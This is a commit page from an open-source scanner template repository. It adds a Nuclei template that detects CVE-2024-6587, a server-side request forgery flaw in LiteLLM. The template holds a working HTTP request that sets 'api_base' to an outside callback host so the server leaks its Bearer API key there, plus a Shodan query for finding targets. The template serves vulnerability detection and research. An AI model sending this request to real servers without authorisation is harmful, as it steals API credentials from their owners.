Merge pull request #10348 from projectdiscovery/CVE-2024-6587

Create CVE-2024-6587.yaml
main
Ritik Chaddha 2024-07-25 14:17:15 +05:30 committed by GitHub
commit 557955fc27
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 46 additions and 0 deletions

View File

@ -0,0 +1,46 @@
id: CVE-2024-6587
info:
name: LiteLLM - Server-Side Request Forgery
author: pdresearch,iamnoooob,rootxharsh,lambdasawa
severity: high
description: |
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
reference:
- https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:439373620
tags: cve,cve2024,ssrf,openai,litellm
http:
- raw:
- |
POST /chat/completions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"model": "command-nightly",
"messages": [
{
"content": "Hello, how are you?",
"role": "user"
}
],
"api_base": "https://{{interactsh-url}}"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "Bearer"